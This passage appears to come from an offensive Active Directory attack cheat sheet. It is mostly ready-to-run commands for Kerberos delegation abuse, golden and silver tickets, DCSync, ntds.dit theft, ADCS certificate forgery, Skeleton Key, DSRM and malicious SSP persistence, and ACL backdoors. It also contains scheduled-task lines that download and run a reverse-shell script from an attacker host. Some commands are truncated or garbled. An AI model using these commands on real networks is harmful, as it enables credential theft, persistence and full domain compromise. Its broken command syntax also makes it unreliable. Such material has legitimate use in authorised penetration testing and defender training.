tgs::s4u /tgt: /user:@<Domain's FQDN> /service:<Service's SPN>
#Finally use mimikatz to ptt the TGS
Invoke-Mimikatz -Command '"kerberos::ptt "'
ALTERNATIVE: Using Rubeus:
Rubeus.exe s4u /user: /rc4:
/impersonateuser: /msdsspn:"<Service's SPN>" /altservice: /ptt
Now we can access the service as the impersonated user!
What if we have delegation rights for only a spesific SPN? (e.g TIME):
In this case we can still abuse a feature of kerberos called "alternative service". This allows us to request TGS tickets for other "alternative" services and not only for the one we have rights for. Thats gives us the leverage to request valid tickets for any service we want that the host supports, giving us full access over the target machine.
If we have GenericALL/GenericWrite privileges on a machine account object of a domain, we can abuse it and impersonate ourselves as any user of the domain to it. For example we can impersonate Domain Administrator and have complete access.
Tools we are going to use:
First we need to enter the security context of the user/machine account that has the privileges over the object. If it is a user account we can use Pass the Hash, RDP, PSCredentials etc.
Exploitation Example:
#Import Powermad and use it to create a new MACHINE ACCOUNT
. .\Powermad.ps1
New-MachineAccount -MachineAccount -Password $(ConvertTo-
SecureString 'p@ssword!' -AsPlainText -Force) -Verbose
#Import PowerView and get the SID of our new created machine account
. .\PowerView.ps1
$ComputerSid = Get-DomainComputer -Properties objectsid | Select -Expand objectsid
#Then by using the SID we are going to build an ACE for the new created machine account using a raw security descriptor:
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
#Next, we need to set the security descriptor in the msDS-
AllowedToActOnBehalfOfOtherIdentity field of the computer account we're taking over, again using PowerView
Get-DomainComputer TargetMachine | Set-DomainObject -Set @{'msdsallowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose
#After that we need to get the RC4 hash of the new machine account's password using Rubeus Rubeus.exe hash /password:'p@ssword!'
#And for this example, we are going to impersonate Domain Administrator on the cifs service of the target computer using Rubeus
Rubeus.exe s4u /user: /rc4:
/impersonateuser:Administrator /msdsspn:cifs/TargetMachine.wtver.domain /domain:wtver.domain /ptt
#Finally we can access the C$ drive of the target machine dir \TargetMachine.wtver.domain\C$
Detailed Articles:
- Wagging the Dog: Abusing Resource-Based Constrained Delegation to Attack Active Directory
❗ In Constrain and Resource-Based Constrained Delegation if we don't have the password/hash of the account with TRUSTED_TO_AUTH_FOR_DELEGATION that we try to abuse, we can use the very nice trick "tgt::deleg" from kekeo or "tgtdeleg" from rubeus and fool Kerberos to give us a valid TGT for that account. Then we just use the ticket instead of the hash of the account to perform the attack.
#Command on Rubeus
Rubeus.exe tgtdeleg /nowrap
Detailed Article: Rubeus – Now With More Kekeo
WUT IS DIS ?: If we manage to compromise a user account that is member of the Backup Operators group, we can then abuse it's SeBackupPrivilege to create a shadow copy of the current state of the DC, extract the ntds.dit database file, dump the hashes and escalate our privileges to DA.
- Once we have access on an account that has the SeBackupPrivilege we can access the DC and create a shadow copy using the signed binary diskshadow:
- #Create a .txt file that will contain the shadow copy process script
- Script ->{
- set context persistent nowriters
- set metadata c:\windows\system32\spool\drivers\color\
- set verbose on
- begin backup
- add volume c: alias mydrive
- expose %mydrive% w:
- end backup
- }
- #Execute diskshadow with our script as parameter
diskshadow /s script.txt
- Next we need to access the shadow copy, we may have the SeBackupPrivilege but we cant just simply copy-paste ntds.dit, we need to mimic a backup software and use Win32 API calls to copy it on an accessible folder. For this we are going to use this amazing repo:
- #Importing both dlls from the repo using powershell
- Import-Module .\SeBackupPrivilegeCmdLets.dll
- Import-Module .\SeBackupPrivilegeUtils.dll
- #Checking if the SeBackupPrivilege is enabled
- Get-SeBackupPrivilege
#If it isn't we enable it 25. Set-SeBackupPrivilege
- #Use the functionality of the dlls to copy the ntds.dit database file from the shadow copy to a location of our choice
- Copy-FileSeBackupPrivilege w:\windows\NTDS\ntds.dit c:<PathToSave>\ntds.dit Overwrite
- #Dump the SYSTEM hive reg save HKLM\SYSTEM c:\temp\system.hive
- Using from impacket or some other tool we copy ntds.dit and the SYSTEM hive on our local machine.
- Use from impacket and dump the hashes.
- Use psexec or another tool of your choice to PTH and get Domain Admin access.
- Abusing Exchange one Api call from DA
- CVE-2020-0688
- PrivExchange Exchange your privileges for Domain Admin privs by abusing Exchange
WUT IS DIS?: If we manage to compromise a child domain of a forest and SID filtering isn't enabled (most of the times is not), we can abuse it to privilege escalate to Domain
Administrator of the root domain of the forest. This is possible because of the SID History field on a kerberos TGT ticket, that defines the "extra" security groups and privileges.
Exploitation example:
#Get the SID of the Current Domain using PowerView
Get-DomainSID -Domain current.root.domain.local
#Get the SID of the Root Domain using PowerView
Get-DomainSID -Domain root.domain.local
#Create the Enteprise Admins SID
Format: RootDomainSID-519
#Forge "Extra" Golden Ticket using mimikatz
kerberos::golden /user:Administrator /domain:current.root.domain.local
/sid: /krbtgt: /sids: /startoffset:0
/endin:600 /renewmax:10080 /ticket:\path\to\ticket\golden.kirbi
#Inject the ticket into memory kerberos::ptt \path\to\ticket\golden.kirbi
#List the DC of the Root Domain dir \dc.root.domain.local\C$
#Or DCsync and dump the hashes using mimikatz lsadump::dcsync /domain:root.domain.local /all
Detailed Articles:
- CVE-2019-0604 RCE Exploitation PoC
- CVE-2019-1257 Code execution through BDC deserialization
- CVE-2020-0932 RCE using typeconverters PoC
- Zerologon: Unauthenticated domain controller compromise: White paper of the vulnerability.
- SharpZeroLogon: C# implementation of the Zerologon exploit.
- Invoke-ZeroLogon: PowerShell implementation of the Zerologon exploit.
- Zer0Dump: Python implementation of the Zerologon exploit using the impacket library.
- CVE-2021-34527: Vulnerability details.
- Impacket implementation of PrintNightmare: Reliable PoC of PrintNightmare using the impacket library.
- C# Implementation of CVE-2021-1675: Reliable PoC of PrintNightmare written in C#.
Active Directory Certificate Services Check for Vulnerable Certificate Templates with: Certify
Note: Certify can be executed with Cobalt Strike's execute-assembly command as well
.\Certify.exe find /vulnerable /quiet
Make sure the msPKI-Certificates-Name-Flag value is set to "ENROLLEE_SUPPLIES_SUBJECT" and that the Enrollment Rights allow Domain/Authenticated Users. Additionally, check that the pkiextendedkeyusage parameter contains the "Client Authentication" value as well as that the "Authorized Signatures Required" parameter is set to 0.
This exploit only works because these settings enable server/client authentication, meaning an attacker can specify the UPN of a Domain Admin ("DA") and use the captured certificate with Rubeus to forge authentication.
Note: If a Domain Admin is in a Protected Users group, the exploit may not work as intended. Check before choosing a DA to target.
Request the DA's Account Certificate with Certify
.\Certify.exe request /template: /quiet /ca:""
/domain:<> /path:CN=Configuration,DC=,DC=com /altname: /machine
This should return a valid certificate for the associated DA account.
The exported cert.pem and cert.key files must be consolidated into a single cert.pem file, with one gap of whitespace between the END RSA PRIVATE KEY and the BEGIN CERTIFICATE.
Example of cert.pem:
#Utilize openssl to Convert to PKCS #12 Format
The openssl command can be utilized to convert the certificate file into PKCS #12 format (you may be required to enter an export password, which can be anything you like).
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" export -out cert.pfx
Once the cert.pfx file has been exported, upload it to the compromised host (this can be done in a variety of ways, such as with Powershell, SMB, certutil.exe, Cobalt Strike's upload functionality, etc.)
After the cert.pfx file has been uploaded to the compromised host, Rubeus can be used to request a Kerberos TGT for the DA account which will then be imported into memory.
.\Rubeus.exe asktht /user: /domain:<> /dc: /certificate: /nowrap /ptt
This should result in a successfully imported ticket, which then enables an attacker to perform various malicious acitivities under DA user context, such as performing a DCSync attack.
- sAMAccountname Spoofing Exploitation of CVE-2021-42278 and CVE-2021-42287
- Weaponisation of CVE-2021-42287/CVE-2021-42278 Exploitation of CVE-2021-42278 and CVE-2021-42287
- noPAC C# tool to exploit CVE-2021-42278 and CVE-2021-42287
- sam-the-admin Python automated tool to exploit CVE-2021-42278 and CVE-202142287
- noPac Evolution of "sam-the-admin" tool
#Execute mimikatz on DC as DA to grab krbtgt hash:
Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -ComputerName <DC'sName>
#On any machine:
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain: /sid:<Domain's SID> /krbtgt:
id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'
#DCsync using mimikatz (You need DA rights or DS-Replication-Get-Changes and DSReplication-Get-Changes-All privileges):
Invoke-Mimikatz -Command '"lsadump::dcsync /user:<AnyDomainUser>"'
#DCsync using from impacket with NTLM authentication /:@<DC'S IP or FQDN> -just-dc-ntlm
#DCsync using from impacket with Kerberos Authentication -no-pass -k /@<DC'S IP or FQDN> -just-dc-ntlm
/ptt -> inject ticket on current running session
/ticket -> save the ticket on the system for later use
Invoke-Mimikatz -Command '"kerberos::golden /domain: /sid: /target: /service:
/rc4:<TheSPN's Account NTLM Hash> /user: /ptt"' SPN List
#Exploitation Command runned as DA:
Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName <DC's FQDN>
#Access using the password "mimikatz"
Enter-PSSession -ComputerName -Credential \Administrator
WUT IS DIS?: Every DC has a local Administrator account, this accounts has the DSRM password which is a SafeBackupPassword. We can get this and then pth its NTLM hash to get local Administrator access to DC!
#Dump DSRM password (needs DA privs):
Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"' -ComputerName <DC's Name>
#This is a local account, so we can PTH and authenticate!
#BUT we need to alter the behaviour of the DSRM account before pth:
#Connect on DC:
Enter-PSSession -ComputerName <DC's Name>
#Alter the Logon behaviour on registry:
New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DsrmAdminLogonBehaviour" -Value 2 -PropertyType DWORD -Verbose
#If the property already exists:
Set-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DsrmAdminLogonBehaviour" -Value 2 -Verbose
Then just PTH to get local admin access on DC!
WUT IS DIS?: We can set our on SSP by dropping a custom dll, for example mimilib.dll from mimikatz, that will monitor and capture plaintext passwords from users that logged on!
From powershell:
#Get current Security Package:
$packages = Get-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig" -
Name 'Security Packages' | select -ExpandProperty 'Security Packages'
#Append mimilib:
$packages += "mimilib"
#Change the new packages name
Set-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig" -Name 'Security Packages' -Value $packages
Set-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa" -Name 'Security Packages' -Value $packages
Invoke-Mimikatz -Command '"misc::memssp"'
Now all logons on the DC are logged to -> C:\Windows\System32\kiwissp.log
DCSync feature for getting krbtgt hash
Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\krbtgt"'
Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -Computername DC01
On any machine
Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:lab.domain.local
/sid:S-1-5-x-x-x-x /krbtgt:00000000000000000000000000000000 id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"' # Execute a task to run the reverse shell script
schtasks /create /S machine.domain.local /SC Weekly /RU "NT Authority\SYSTEM" /TN
"taskname" /TR "powershell.exe -c 'iex(New-Object
Net.WebClient).DownloadString(''http://attackerip/Invoke-PowerShellTcp.ps1''')'" schtasks /Run /S machine.domain.local /TN "taskname"
Golden ticket parameters
Invoke-Mimikatz -Command | Resume |
kerberos::golden | Name of the module |
/User:Administrator | Username for which the TGT is generated |
/domain:lab.domain.local | Domain FQDN |
/sid:S-1-5-x-x-x-x | SID of the domain |
/krbtgt:00000000000000000000000000000000 | NTLM (RC4) hash of the krbtgt account. Use /aes128 and /aes256 for using AES keys |
/id:500 /groups:512 | Optional User RID (default 500) and |
Group default 513 512 520 518 519) | |
/ptt or /ticket | Injects the ticket in current PowerShell process - no need to save the ticket on disk - Saves the ticket to a file for later use |
/startoffset:0 | Optional when the ticket is available (default 0 - right now) in minutes. Use negative for a ticket available from past and a larger number for future |
Invoke-Mimikatz -Command | Resume |
/endin:600 | Optional ticket lifetime (default is 10 years) in minutes. The default AD setting is 10 hours = 600 minutes |
/renewmax:10080 | Optional ticket lifetime with renewal (default is 10 years) in minutes. The default AD setting is 7 days = 100800 |
- Using hash of the Domain Controller computer account
Invoke-Mimikatz -Command '"kerberos::golden /domain:lab.domain.local /sid:S-1-5-x-x-x-x
/target:DC01.lab.domain.local /service:CIFS /rc4:00000000000000000000000000000000 /user:Administrator /ptt"'
Invoke-Mimikatz -Command '"kerberos::golden /domain:target.local /sid:S-1-5-x-x-x-x
/ /service:HOST/rc4:00000000000000000000000000000000 /user:Administrator /ptt"'
Invoke-Mimikatz -Command '"kerberos::golden /domain:target.local /sid:S-1-5-x-x-x-x
/ /service:RPCSS/rc4:00000000000000000000000000000000 /user:Administrator /ptt"'
Get-WmiObject -Class win32_operatingsystem -ComputerName
Silver ticket parameters
Invoke-Mimikatz -Command | Resume |
kerberos::golden | Name of the module (there is no Silver module!) |
/User:Administrator | Username for which the TGT is generated |
/domain:lab.domain.local | Domain FQDN |
/sid:S-1-5-x-x-x-x | SID of the domain |
/target:DC01.lab.domain.local | Target server FQDN |
Invoke-Mimikatz -Command | Resume |
/service:cifs | The SPN name of service for which TGS is to be created |
/rc4:00000000000000000000000000000000 | NTLM (RC4) hash of the service account. Use /aes128 and /aes256 for using AES keys |
/id:500 /groups:512 | Optional User RID (default 500) and |
Group (default 513 512 520 518 519) | |
/ptt | Injects the ticket in current PowerShell process - no need to save the ticket on disk |
/startoffset:0 | Optional when the ticket is available (default 0 - right now) in minutes. Use negative for a ticket available from past and a larger number for future |
/endin:600 | Optional ticket lifetime (default is 10 years) in minutes. The default AD setting is 10 hours = 600 minutes |
/renewmax:10080 | Optional ticket lifetime with renewal (default is 10 years) in minutes. The default AD setting is 7 days = 100800 |
- Create a silver ticket for the HOST SPN which will allow us to schedule a task
Invoke-Mimikatz -Command '"kerberos::golden /domain:lab.domain.local /sid:S-1-5-x-x-x-x
/target:DC01.lab.dmoain.local /service:HOST /rc4:00000000000000000000000000000000 /user:Administrator /ptt"' # CONFIGURE REMOTE TASK
schtasks /create /S DC01.lab.domain.local /SC Weekly /RU "NT Authority\SYSTEM" /TN
"Abuse01" /TR "powershell.exe -c 'iex (New-Object
$sess = New-PSSession DC01.domain.local
Enter-PSSession -Session $sess
Invoke-Command -FilePath C:\Invoke-Mimikatz.ps1 -Session $sess
Enter-PSSession -Session $sess
Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"'
Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName DC01.lab.dmoain.local
Enter-PSSession -Computername DC01 -credential domain\Administrator
- Skeleton Key with lsass running as a protected process mimikatz # privilege::debug mimikatz # !+ mimikatz # !processprotect /process:lsass.exe /remove mimikatz # misc::skeleton mimikatz # !- needs the mimikatz driver (mimidriv.sys) on disk of the target DC
- Dump DSRM password (needs DA privs)
Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"' -Computername DC01
- Eneable DSRM account to login
Enter-PSSession -Computername DC01
New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa" -Name
"DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD
- Pass the DSRM hash
Invoke-Mimikatz -Command '"sekurlsa::pth /domain:DC01 /user:Administrator
/ntlm:00000000000000000000000000000000 /run:powershell.exe"
- Dump local acconut
Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -Computername DC01
$sess = New-PSSession DC01.domain.local
Enter-PSSession -Session $sess
Invoke-Command -FilePath C:\Invoke-Mimikatz.ps1 -Session $sess
Enter-PSSession -Session $sess
Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"'
New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD
Invoke-Mimikatz -Command '"sekurlsa::pth /domain:DC01 /user:Administrator
/ntlm:00000000000000000000000000000000 /run:powershell.exe"'
HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages
$packages = Get-ItemProperty
HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\ -Name 'Security Packages'| select -
ExpandProperty 'Security Packages'
$packages += "mimilib"
HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\ -Name 'Security Packages' -Value $packages
Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\ -Name 'Security Packages' Value $packages
Invoke-Mimikatz -Command '"misc::memssp"'
Security Descriptor Propagator (SDPROP) runs every hour and compares the ACL of protected groups and members with the ACL of AdminSDHolder and any differences are overwritten on the object ACL
Protected Groups | |
Account Operators | Enterprise Admins |
Backup Operators | Domain Controllers |
Server Operators | Read-only Domain Controllers |
Print Operators | Schema Admins |
Domain Admins | Administrators |
Replicator |
- Well known abuse
Groups | Resume |
Account | |
Operators | Cannot modify DA/EA/BA groups. Can modify nested group within |
Backup | |
Operators | Backup GPO, edit to add SID of controlled account to a privileged group and Restore |
Server Operators | Run a command as system (using the disabled Browser service) |
Print Operators | Copy ntds.dit backup, load device drivers |
- Add FullControl permissions for a user to the AdminSDHolder using PowerView as DA
Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName attacker -Rights All -Verbose
- Using ActiveDirectory Module and Set-ADACL
Set-ADACL -DistinguishedName
'CN=AdminSDHolder,CN=System,DC=test,DC=domain,DC=local' -Principal attacker -Verbose
- Interesting permissions (ResetPassword, WriteMembers)
Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName attacker -Rights ResetPassword -Verbose
Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName attacker -Rights WriteMembers -Verbose
- Run SDProp manually
Import-Module Invoke-SDPropagator.ps1
Invoke-SDPropagator -timeoutMinutes 1 -showProgress -Verbose
- Check the Domain Admins permission
Get-ObjectAcl -SamAccountName "Domain Admins" -ResolveGUIDs | ?{$_.IdentityReference match 'attacker'}
(Get-Acl -Path 'AD:\CN=Domain Admins,CN=Users,DC=lab,DC=domain,DC=local').Access |
?{$_.IdentityReference -match 'attacker'}
- Abusing FullControl using PowerView_dev
Add-DomainGroupMember -Identity 'Domain Admins' -Members attackerda -Verbose
Add-ADGroupMember -Identity 'Domain Admins' -Members attackerda
- Abusing ResetPassword using PowerView_dev
Set-DomainUserPassword -Identity targetaccount -AccountPassword (ConvertTo-SecureString "Password@123" -AsPlainText -Force) -Verbose
Set-ADAccountPassword -Identity targetaccount -NewPassword (ConvertTo-SecureString
"Password@123" -AsPlainText -Force) -Verbose
. .\PowerView.ps1
Get-ObjectAcl -DistinguishedName "dc=domain,dc=local" -ResolveGUIDs |
?{($.IdentityReference -match "targetuser") -and (($.ObjectType -match 'replication') -or
($_.ActiveDirectoryRights -match 'GenericAll'))}
Add-ObjectAcl -TargetDistinguishedName "dc=domain,dc=local" -PrincipalSamAccountName targetuser -Rights DCSync -Verbose
Get-ObjectAcl -DistinguishedName "dc=domain,dc=local" -ResolveGUIDs |
?{($.IdentityReference -match "targetuser") -and (($.ObjectType -match 'replication') -or ($_.ActiveDirectoryRights -match 'GenericAll'))}
Add FullControl rights
Add-ObjectAcl -TargetDistinguishedName 'DC=lab,DC=domain,DC=local' PrincipalSamAccountName john -Rights All -Verbose
- Using ActiveDirectory Module and Set-ADACL
Set-ADACL -DistinguishedName 'DC=lab,DC=domain,DC=local' -Principal john -Verbose
- Add rights for DCSync
Add-ObjectAcl -TargetDistinguishedName 'DC=lab,DC=domain,DC=local' PrincipalSamAccountName bob -Rights DCSync -Verbose
- Using ActiveDirectory Module and Set-ADACL
Set-ADACL -DistinguishedName 'DC=lab,DC=domain,DC=local' -Principal bob -GUIDRight DCSync -Verbose
- Execute DCSync
Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\krbtgt"'
- ACLs can be modified to allow non-admin users access to securable objects
- On local machine for jane
Set-RemoteWMI -UserName jane -Verbose
- On remote machine for jane without explicit credentials
Set-RemoteWMI -UserName jame -ComputerName DC01 -namespace 'root\cimv2' -Verbose
- On remote machine with explicit credentials
Set-RemoteWMI -UserName jane -ComputerName DC01 -Credential Administrator namespace 'root\cimv2' -Verbose
- On remote machine remove permissions
Set-RemoteWMI -UserName jane -ComputerName DC01 -namespace 'root\cimv2' -Remove Verbose
- On local machine for joe
Set-RemotePSRemoting -UserName joe -Verbose
- On remote machine for joe without credentials
Set-RemotePSRemoting -UserName joe -ComputerName DC01 -Verbose
- On remote machine, remove the permissions
Set-RemotePSRemoting -UserName joe -ComputerName DC01 -Remove
- Using DAMP, with admin privs on remote machine
Add-RemoteRegBackdoor -ComputerName DC01 -Trustee jack -Verbose
- As jack, retrieve machine account hash
Get-RemoteMachineAccountHash -ComputerName DC01 -Verbose
- Retrieve local account hash
Get-RemoteLocalAccountHash -ComputerName DC01 -Verbose
- Retrieve domain cached credentials Get-RemoteCachedCredential -ComputerName DC01 -Verbose
- Attacking .NET serialization
- Friday the 13th: JSON Attacks - Slides
- Friday the 13th: JSON Attacks - Whitepaper
- Friday the 13th: JSON Attacks - Video(demos)
- Are you my Type? - Slides
- Are you my Type? - Whitepaper
- Exploiting .NET Managed DCOM
- Finding and Exploiting .NET Remoting over HTTP using Deserialisation references in the wild
- Finding Passwords in SYSVOL & Exploiting Group Policy Preferences
- Pentesting in the Real World: Group Policy Pwnage
- MS14-068: Vulnerability in (Active Directory) Kerberos Could Allow Elevation of Privilege
- Digging into MS14-068, Exploitation and Defence
- From MS14-068 to Full Compromise – Step by Step
- Abusing DNSAdmins privilege for escalation in Active Directory
- From DNSAdmins to Domain Admin, When DNSAdmins is More than Just DNS Administration
- Domain Controller Print Server + Unconstrained Kerberos Delegation = Pwned Active Directory Forest
- Active Directory Security Risk #101: Kerberos Unconstrained Delegation (or How Compromise of a Single Server Can Compromise the Domain)
- Unconstrained Delegation Permissions
- Trust? Years to earn, seconds to break
Hunting in Active Directory: Unconstrained Delegation & Forests Trusts
- Exploiting Weak Active Directory Permissions With Powersploit
- Escalating privileges with ACLs in Active Directory
- Abusing Active Directory Permissions with PowerView
- BloodHound 1.3 – The ACL Attack Path Update
- Scanning for Active Directory Privileges & Privileged Accounts
- Active Directory Access Control List – Attacks and Defense
- aclpwn - Active Directory ACL exploitation with BloodHound
- A Guide to Attacking Domain Trusts
- It’s All About Trust – Forging Kerberos Trust Tickets to Spoof Access across Active Directory Trusts
- Active Directory forest trusts part 1 - How does SID filtering work?
- The Forest Is Under Control. Taking over the entire Active Directory forest
- Not A Security Boundary: Breaking Forest Trusts
- The Trustpocalypse
- Privilege Escalation With DCShadow
- DCShadow
- DCShadow explained: A technical deep dive into the latest AD attack technique
- DCShadow - Silently turn off Active Directory Auditing
DCShadow - Minimal permissions, Active Directory Deception, Shadowception and more
- How to get SQL Server Sysadmin Privileges as a Local Admin with PowerUpSQL
- Compromise With Powerupsql – Sql Attacks
- SQL Server – Link… Link… Link… and Shell: How to Hack Database Links in SQL Server!
- SQL Server Link Crawling with PowerUpSQL
- Performing Pass-the-hash Attacks With Mimikatz
- How to Pass-the-Hash with Mimikatz
- Pass-the-Hash Is Dead: Long Live LocalAccountTokenFilterPolicy
- Targeted Workstation Compromise With Sccm
- PowerSCCM - PowerShell module to interact with SCCM deployments
- Password Spraying Windows Active Directory Accounts - Tradecraft Security Weekly #5
- Attacking Exchange with MailSniper
- A Password Spraying tool for Active Directory Credentials by Jacob Wilkin
- GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application
- DeathStar - Automate getting Domain Admin using Empire
ANGRYPUPPY - Bloodhound Attack Path Automation in CobaltStrike
- Bypassing Memory Scanners with Cobalt Strike and Gargoyle
- In-Memory Evasions Course
- Bring Your Own Land (BYOL) – A Novel Red Teaming Technique
- Modern Defenses and YOU!
- OPSEC Considerations for Beacon Commands
- Red Team Tradecraft and TTP Guidance
- Fighting the Toolset
- Red Team Techniques for Evading, Bypassing, and Disabling MS Advanced Threat Protection and Advanced Threat Analytics
- Red Team Revenge - Attacking Microsoft ATA
- Evading Microsoft ATA for Active Directory Domination
- How to bypass AMSI and execute ANY malicious Powershell code
- AMSI: How Windows 10 Plans to Stop Script-Based Attacks
- AMSI Bypass: Patching Technique
- Invisi-Shell - Hide your Powershell script in plain sight. Bypass all Powershell security features
- Subverting Sysmon: Application of a Formalized Security Product Evasion Methodology
- sysmon-config-bypass-finder
- How Attackers Pull the Active Directory Database (NTDS.dit) from a Domain Controller
- Extracting Password Hashes From The Ntds.dit File
- Kerberoasting Without Mimikatz
- Cracking Kerberos TGS Tickets Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory Domain
- Extracting Service Account Passwords With Kerberoasting
- Cracking Service Account Passwords with Kerberoasting
- Kerberoast PW list for cracking passwords with complexity requirements
- Mimikatz and DCSync and ExtraSids, Oh My
- Mimikatz DCSync Usage, Exploitation, and Detection
- Dump Clear-Text Passwords for All Admins in the Domain Using Mimikatz DCSync
Pwning with Responder – A Pentester’s Guide
- How Attackers Use Kerberos Silver Tickets to Exploit Systems
- Sneaky Active Directory Persistence #16: Computer Accounts & Domain Controller Silver Tickets
- Sneaky Active Directory Persistence #15: Leverage AdminSDHolder & SDProp to (Re)Gain Domain Admin Rights
- Persistence Using Adminsdholder And Sdprop
- Unlocking All The Doors To Active Directory With The Skeleton Key Attack
- Skeleton Key
- Attackers Can Now Use Mimikatz to Implant Skeleton Key on Domain Controllers & BackDoor Your Active Directory Forest
- The Most Dangerous User Right You (Probably) Have Never Heard Of
- SeEnableDelegationPrivilege Active Directory Backdoor
- Sneaky Active Directory Persistence #12: Malicious Security Support Provider (SSP) DIRECTORY SERVICES RESTORE MODE
- Sneaky Active Directory Persistence #11: Directory Service Restore Mode (DSRM)
- Sneaky Active Directory Persistence #13: DSRM Persistence v2
- An ACE Up the Sleeve: Designing Active Directory DACL Backdoors
- Shadow Admins – The Stealthy Accounts That You Should Fear The Most
- The Unintended Risks of Trusting Active Directory
Tools & Scripts
- PowerView - Situational Awareness PowerShell framework
- BloodHound - Six Degrees of Domain Admin
- Impacket - Impacket is a collection of Python classes for working with network protocols
- - Active Directory ACL exploitation with BloodHound
- CrackMapExec - A swiss army knife for pentesting networks
- ADACLScanner - A tool with GUI or command linte used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory
- zBang - zBang is a risk assessment tool that detects potential privileged account threats
- PowerUpSQL - A PowerShell Toolkit for Attacking SQL Server
- Rubeus - Rubeus is a C# toolset for raw Kerberos interaction and abuses
- ADRecon - A tool which gathers information about the Active Directory and generates a report which can provide a holistic picture of the current state of the target AD environment
- Mimikatz - Utility to extract plaintexts passwords, hash, PIN code and kerberos tickets from memory but also perform pass-the-hash, pass-the-ticket or build Golden tickets
- Grouper - A PowerShell script for helping to find vulnerable settings in AD Group Policy. Resources/